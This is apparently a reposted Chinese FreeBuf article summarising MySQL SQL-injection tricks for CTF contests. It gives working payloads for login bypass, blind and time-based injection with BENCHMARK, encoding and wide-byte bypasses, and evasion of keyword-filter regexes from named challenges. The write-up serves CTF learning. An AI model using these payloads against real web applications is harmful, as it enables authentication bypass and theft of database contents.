CTF比赛中SQL注入的一些经验总结

栏目: 数据库 · 发布时间: 7年前

内容简介:CTF比赛中SQL注入的一些经验总结

*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载

ctf中 sql 注入下的一些小技巧

最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看题解,就特此做了一个paper方便总结

注释符

以下是 Mysql 中可以用到的单行注释符:

#  
-- -
;%00

CTF比赛中SQL注入的一些经验总结

以下是Mysql中可以用到的多行注释符(mysql下需要闭合):

/*
`

CTF比赛中SQL注入的一些经验总结

判断当前库是否有字段名

对于CTF中的题,某些可以直接判断有无flag表1′ or(flag)例如:全表

CTF比赛中SQL注入的一些经验总结

用or试一下

CTF比赛中SQL注入的一些经验总结

这里解释一下为什么or的结果为什么不全,说白了也就是atoi函数的特性

or(列名)其实是遍历字段名中的每个值然后选取那些不为false的内容,因为在mysql中’ssdd’字符串默认等于0等于false所以不显示,而’4ddf’这样的字符串默认等于4,也就是true也就会返回了

limit下的字段数判断

众所周知where条件下的字段数可以用 order by 判断,而limit后可以利用 1,into @,@ (@为字段数)判断字段数@为mysql临时变量,

CTF比赛中SQL注入的一些经验总结

原理请看 http://www.w3school.com.cn/sql/sql_select_into.asp

or条件下的回显

以前总是对 where id='1' or '1'='1'where id='0' or '1'='1' 的回显一直不是很了解,所以今天搭建环境测试了一下,如下可见

CTF比赛中SQL注入的一些经验总结

所以猜测在or条件下前后如果都为真则返回所有结果,否则只返回条件为真的一方的值

concat与concat_ws与group_concat

1.2 MySQL的concat函数在连接字符串的时候,只要其中一个是NULL,那么将返回NULLMySQL的concat函数在连接字符串的时候,只要其中一个是NULL,那么将返回NULL

mysql> select concat('11','22',null);+------------------------+| concat('11','22',null) |+------------------------+| NULL |+------------------------+1 row in set (0.00 sec)

和concat不同的是, concat_ws函数在执行的时候,不会因为NULL值而返回NULL

mysql> select concat_ws(',','11','22',NULL);+-------------------------------+| concat_ws(',','11','22',NULL) |+-------------------------------+| 11,22 |+-------------------------------+1 row in set (0.00 sec)

盲注下的条件语句和时间函数

这是我前几天刷wechall碰到的题,例如一下注入语句

select * from test1 where id='$_GET[id]';

已知没有回显位,id=3和id=1返回结果不一样并且过滤了’,空格,等等一堆关键词,不存在宽字节注入给个B师傅当时的payload

if(substr(flag,1,1)in(0x41),3,0)

写个脚本爆破之可得flag而基于时间的注入以前都是一直用的if(xxxxxx,1,sleep(2));最也发现了一个更好的函数 BENCHMARK

IF(left(version(),1,1)=5, BENCHMARK(100000,SHA1('1')), 1)

BENCHMARK函数是指执行某函数的次数,次数多时能够达到与sleep函数相同的效果

逻辑操作符被过滤

先放一波like语法 http://www.runoob.com/mysql/mysql-like-clause.html

绕过\’被过滤

hex编码

SELECT password FROM Users WHERE username = 0x61646D696E

char编码

SELECT FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)

html实体字符编码

SELECT FROM Users WHERE username = 'admin'

%2527

这里主要是因为绕过magic_quotes_gpc过滤,因为%25解码为%,结合后面的27也就是%27也就是',所以成功绕过过滤。

宽字节就不说了gbk编码在单引号前面加一个%df即可

表名等关键字被过滤

以information_schema.tables为例

空格 information_schema . tables

着重号 information</em>schema.tables

特殊符 /!informationschema.tables/

别名 information_schema.(partitions),(statistics),(keycolumnusage),(table_constraints)

表单认证绕过

这里选两题一题是实验吧的web分类第一题

"SELECT username FROM users WHERE username='$username' AND password='$password'"

这样的直接 username=admin'# 即可,或者 username='='&password='=' 这样就能构造出

"SELECT username FROM users WHERE username=''='' AND password=''=''"

所以逻辑判断绕过第二题是iscc的简单注入,猜测大致后台语句如下,PS:后台密码是md5处理过的

$results = SELECT password FROM users WHERE username='$username'
if($results==$_GET[$password]){
    getflag();
}

这里可以构造 username=0' union select md5(1)#&password=1

Mysql字符编码利用技巧

传入的username=admin%c2,php的检测if ($username === ‘admin’)自然就可以绕过的,在mysql中可以正常查出username=’admin’的结果,原理是Mysql在转换字符集的时候,将不完整的字符给忽略了。具体可参照P师傅文章 https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html

隐式类型转换

这里先上几个图,自行体会精神

CTF比赛中SQL注入的一些经验总结

CTF比赛中SQL注入的一些经验总结

这里为什么我们输入为什么name=0会导致返回数据呢?其实这里跟 php 弱类型有异曲同工之妙,mysql在比较一个整数和一个字符串也会强制把字符串转化为整数进行比较,并返回一个warning,所以这里

pupil
admin

都会被转换为0所以与0比较相等,那么我们进一步猜想那一个非0开头的字符串强制转化是什么呢

CTF比赛中SQL注入的一些经验总结

由此可见,与PHP一样,mysql也会把字符串强制转化为开头的数字,若开头是字母则强制转化为0,那我们怎么利用这一黑魔法呢,众所周知,mysql一般都是字符型注入,很少有数字型注入的,就像 where username='input' 这样,我们单纯的输入数字是会被转化成字符串的,就像这样

CTF比赛中SQL注入的一些经验总结

这时候我们就需要做一些操作来构造注入点了,比如利用算术运算符

+,-,*,/,%

又或者位操作符

&,|,^

下面我们以 + 为例进行演示

CTF比赛中SQL注入的一些经验总结

过滤了&,|,*,/,=等逻辑处理字符

可以用in,exists,position..in,>,<,!,<>,like等操作符绕过这个链接有详细介绍 http://www.runoob.com/mysql/mysql-like-clause.html 这里举一个例子,比如要使用sql盲注的话但是过滤了substr,mid,asccii,ord等函数可以使用一下语句

admin' AND password LIKE "p%" --

一点实战例子

陕西省网络空间安全

过滤了

/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i"

这里没有过滤^,所以可以绕过,payload

username=admin'^(ascii(mid((passwd)from(1)))>=10)^'1'='1

pwnhubcuit校赛

过滤了

/ |\*|#|,|union|like|sleep|regexp|left|right|strcmp|substr|=|limit|instr|benchmark|oct|\/|format|lpad|rpad|mod|insert|lower|bin|mid|hex|substring|ord|and|field|file|ascii|char|—|\|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%20')."|".urldecode('%a0')."/i

这里过滤了&,|,*,=等符号和substring,mid可以使用in,exists,>,<,<>,比较运算符绕过,payload

'where((table_schema)in(0x6261636b656e64)))r)where((table_name<0x74)))>0x{0})'

webhacking,kr

过滤了

union|and|||&|=|urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldeco
de('%20')."|".urldecode('%a0').|/**/|/i

这里这里if和substr都没被过滤,并且空格可以被%0a绕过,所以payload

%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,0)

最后总结一下注入题(手工注入。。)的一般思路(大牛轻喷),对于一般注入首先要找到注入点,比如有很多参数的先确定哪个参数好注入,再尝试有无过滤或者过滤了那些字符,waf本身是否有问题导致直接可以大小写,双写,编码绕过的。当然一般ctf中的题注入如果有waf一般都是过滤不完全的,耐心点就可以找出payload,最后就是注意一下参数提交的方式,有时候一些题目get方式过滤的很严格然而post只是象征性的过滤一下,还有一些用$_REQUEST方式的注意除了get和post还可以尝试cookie注入。

*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

自品牌

自品牌

[美] 丹·斯柯伯尔(Dan Schawbel) / 佘卓桓 / 湖南文艺出版社 / 2016-1-1 / 39.80元

什么是自品牌?如何利用新媒体推广自己?如何放大自己的职业优势? 细化到如何巩固“弱联系”人脉?如何在团队里合作与生存?如何开创自己的事业?这些都是职场人不得不面临的问题,但少有人告诉你答案,你需要利用书里分享的高效方法独辟蹊径,把自己变成职场里高性价比的人才。这是一本教你利用新型社交媒体开发职业潜能的自我管理读本,不管你是新人还是老鸟,都可以通过打造自品牌在职场中脱颖而出。如果不甘平庸,就亮......一起来看看 《自品牌》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换